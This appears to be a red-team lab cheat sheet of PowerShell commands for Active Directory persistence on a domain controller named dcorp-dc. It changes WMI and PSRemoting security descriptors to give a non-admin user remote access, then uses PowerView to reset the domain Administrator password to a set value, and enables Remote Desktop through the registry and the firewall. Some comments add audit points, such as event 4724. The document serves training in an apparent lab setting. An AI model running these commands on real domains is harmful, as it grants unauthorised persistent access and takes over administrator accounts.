Persistence ACLs - Security Descriptors
Need DA
Security Descriptors
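#Need DA: each Set-Remote* call below presumably rewrites a security descriptor on the target (WMI namespace / PSRemoting endpoint), which is why admin rights are required and why the resulting ACL is the artifact to audit
Import-Module Set-RemoteWMI
Import-Module Set-RemotePSRemoting.ps1
#On Local Machine for Student529 or your current user
Set-RemoteWMI -UserName student529 -Verbose
#On Remote Machine without Credentials (uses the current DA session)
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -ComputerName dcorp-dc -Verbose
#On Remote Machine with explicit Credentials (both calls pass -Credential; the earlier note said "without")
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -ComputerName dcorp-dc -Credential Administrator -Verbose
#On Remote Machine remove permissions: -Remove reverts the descriptor change (note the space and plain hyphen before -namespace; the original had them fused by an en-dash)
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
#verify that we have access and can execute command with WMI
#Open Powershell with student529 non-admin user
#A non-admin account succeeding at a remote WMI query against a DC is itself the detection signal: compare namespace security on the DC against the expected baseline
Get-Wmiobject -Class Win32_operatingsystem -Computername dcorp-dc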
----------Abuse WMI-----
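#If we executed Set-RemotePSRemoting.ps1, we can now use invoke-command:
#Open Powershell with student529 non-admin user
Invoke-command -ScriptBlock{whoami /priv} -ComputerName dcorp-dc
Import-Module .\PowerView_dev.ps1
#Resets the domain Administrator password; a reset on a privileged account is typically logged on the DC (security event 4724) and is the obvious audit point for this step
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@1234" -AsPlainText -Force) -Verbose
#Enter Session with new password (plain hyphens before -Computername/-credential; the original had en-dashes, which PowerShell does not treat as parameter markers)
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator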
----------#Extra-------
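#Enable Remote Desktop (space before -name was missing in the original line)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP (UserAuthentication=1 requires Network Level Authentication)
#These two registry values and the firewall rule state are the host-side artifacts to baseline and monitor on a DC
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
Security Descriptors - Remote Registry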